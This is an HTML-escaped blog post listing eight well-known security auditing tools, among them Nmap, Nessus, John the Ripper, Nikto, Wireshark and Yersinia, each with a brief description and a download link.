&lt;div class=&quot;entry&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;&quot;&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;strong style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;1. Nmap&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
I think everyone has heard of this one, recently evolved into the 4.x series.&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu6pdijH-D4s4f2syUxDpXRbE2kcBGC1gCLYah4gd6CfZI7qD53j6qHYI8fD79MR4iN27i31RYFMX0Ls1H7su5WEF6ND6OuAFz9yMfqm2mqyVMwvndMagi6pOzFWAP3e1doKdQchO849w/s1600/Nmap_Tutorial_2012.jpg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;154&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu6pdijH-D4s4f2syUxDpXRbE2kcBGC1gCLYah4gd6CfZI7qD53j6qHYI8fD79MR4iN27i31RYFMX0Ls1H7su5WEF6ND6OuAFz9yMfqm2mqyVMwvndMagi6pOzFWAP3e1doKdQchO849w/s200/Nmap_Tutorial_2012.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;Nmap
 (“Network Mapper”) is a free open source utility for network 
exploration or security auditing. It was designed to rapidly scan large 
networks, although it works fine against single hosts. Nmap uses raw IP 
packets in novel ways to determine what hosts are available on the 
network, what services (application name and version) those hosts are 
offering, what operating systems (and OS versions) they are running, 
what type of packet filters/firewalls are in use, and dozens of other 
characteristics. Nmap runs on most types of computers and both console 
and graphical versions are available. Nmap is free and open source.&lt;br /&gt;
&lt;a href=&quot;&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://nmap.org/download.html&quot; target=&quot;_blank&quot;&gt;Get nmap here&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;strong style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;2. Nessus Remote Security Scanner&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9yQx7uYhcLaacsrMiOPd9DlsV8Lxctm0cynvHyqk4AOtNWgBAlUFrUQDosogh1pwZUfJpuRVgtHk2h2jVi1ll9TQqVwDYOhUX0MpXGZQ-Vc1PaG9rAX8UfPB4uFHn1oSnuBgQjFBJWZU/s1600/Nessus+5.0+Vulnerability+Scanner.jpg&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;185&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9yQx7uYhcLaacsrMiOPd9DlsV8Lxctm0cynvHyqk4AOtNWgBAlUFrUQDosogh1pwZUfJpuRVgtHk2h2jVi1ll9TQqVwDYOhUX0MpXGZQ-Vc1PaG9rAX8UfPB4uFHn1oSnuBgQjFBJWZU/s200/Nessus+5.0+Vulnerability+Scanner.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;Recently went closed source, but is still essentially free. Works with a client-server framework.&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;color: #3f312e;&quot;&gt;Nessus is the world’s most popular&amp;nbsp;&lt;/span&gt;vundra&amp;nbsp;vulnerability scanner&lt;span style=&quot;color: #3f312e;&quot;&gt;&amp;nbsp;used
 in over 75,000 organizations world-wide. Many of the world’s largest 
organizations are realizing significant cost savings by using Nessus to 
audit business-critical enterprise devices and applications.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://www.nessus.org/products/nessus/nessus-download-agreement&quot; target=&quot;_blank&quot;&gt;Get Nessus here&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;span id=&quot;more-3&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;strong style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;3. John the Ripper&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent;&quot;&gt;John
 the Ripper is a fast password cracker, currently available for many 
flavors of Unix (11 are officially supported, not counting different 
architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to
 detect weak Unix passwords. Besides several crypt(3) password hash 
types most commonly found on various Unix flavors, supported out of the 
box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several
 more with contributed patches.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://www.openwall.com/john/&quot; target=&quot;_blank&quot;&gt;Get JTR here&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;strong style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;4. Nikto&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUkT3NZDStyXOfXdYjlpPRFS26Mwb8zcsFCsd52x5oBzX5xc8uNRUTIE8SeyN5xAL74RZ71ppwvsOW5xYNLHN12UaCv4aW33Fb4Zpez0MP887pkhGT1UIpwjM14Fz-yeBVSraTe1Jrasc/s1600/nikto_thumb%5B4%5D.jpg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;133&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUkT3NZDStyXOfXdYjlpPRFS26Mwb8zcsFCsd52x5oBzX5xc8uNRUTIE8SeyN5xAL74RZ71ppwvsOW5xYNLHN12UaCv4aW33Fb4Zpez0MP887pkhGT1UIpwjM14Fz-yeBVSraTe1Jrasc/s200/nikto_thumb%5B4%5D.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;Nikto
 is an Open Source (GPL) web server scanner which performs comprehensive
 tests against web servers for multiple items, including over 3200 
potentially dangerous files/CGIs, versions on over 625 servers, and 
version specific problems on over 230 servers. Scan items and plugins 
are frequently updated and can be automatically updated (if desired).&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
Nikto
 is a good CGI scanner, there are some other tools that go well with 
Nikto (focus on http fingerprinting or Google hacking/info gathering 
etc, another article for just those).&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://www.cirt.net/nikto2&quot; target=&quot;_blank&quot;&gt;Get Nikto here&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;strong style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;5. SuperScan&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-81wFl3vvymsD7j9UZk8-hq1AAY-mmmUSK4e2QyYD1oY71hAJXPK8vC6CevEl81Pl9yx8i8htd5LCiuJ7SYrd-K7D-Pv267n4iXvVNDTVsO1wDH_AxS5Tfz3fJO25jR7BC8xsY_fA9Ng/s1600/LOGO+SS.jpg&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-81wFl3vvymsD7j9UZk8-hq1AAY-mmmUSK4e2QyYD1oY71hAJXPK8vC6CevEl81Pl9yx8i8htd5LCiuJ7SYrd-K7D-Pv267n4iXvVNDTVsO1wDH_AxS5Tfz3fJO25jR7BC8xsY_fA9Ng/s200/LOGO+SS.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;Powerful
 TCP port scanner, pinger, resolver. SuperScan 4 is an update of the 
highly popular Windows port scanning tool, SuperScan.&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://www.foundstone.com/&quot; target=&quot;_blank&quot;&gt;Get SuperScan here&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;strong style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;6. p0f&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
– machines that connect to your box (SYN mode),&lt;br /&gt;
– machines you connect to (SYN+ACK mode),&lt;br /&gt;
– machine you cannot connect to (RST+ mode),&lt;br /&gt;
– machines whose communications you can observe.&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
Basically it can fingerprint anything, just by listening, it doesn’t make&amp;nbsp;&lt;strong style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;ANY&lt;/strong&gt;&amp;nbsp;active connections to the target machine.&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://lcamtuf.coredump.cx/p0f3/#/p0f.shtml&quot; target=&quot;_blank&quot;&gt;Get P0F here&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;strong style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;7. Wireshark (Formely Ethereal)&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglsLZZNzyPWZcNlHcX69gwzmSQuBHAtMdLCWJyfos6snyLOyCRNBB_LKqvv41MC3gJ-0oEaWZyp0jOQepKf5atKQyxDNXyOI7h_SwJBU7zIJ6XBDFnHGSosMBuVxgs3b2j0dZNq_jP7OQ/s1600/wireshark.jpg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglsLZZNzyPWZcNlHcX69gwzmSQuBHAtMdLCWJyfos6snyLOyCRNBB_LKqvv41MC3gJ-0oEaWZyp0jOQepKf5atKQyxDNXyOI7h_SwJBU7zIJ6XBDFnHGSosMBuVxgs3b2j0dZNq_jP7OQ/s200/wireshark.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;Wireshark
 is a GTK+-based network protocol analyzer, or sniffer, that lets you 
capture and interactively browse the contents of network frames. The 
goal of the project is to create a commercial-quality analyzer for Unix 
and to give Wireshark features that are missing from closed-source 
sniffers.&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
Works
 great on both Linux and Windows (with a GUI), easy to use and can 
reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://www.wireshark.org/&quot; target=&quot;_blank&quot;&gt;Get Wireshark here&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;strong style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;8. Yersinia&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
Yersinia
 is a network tool designed to take advantage of some weakeness in 
different Layer 2 protocols. It pretends to be a solid framework for 
analyzing and testing the deployed networks and systems. Currently, the 
following network protocols are implemented: Spanning Tree Protocol 
(STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), 
Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol 
(HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking 
Protocol (VTP).&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
The best Layer 2 kit there is.&lt;/div&gt;
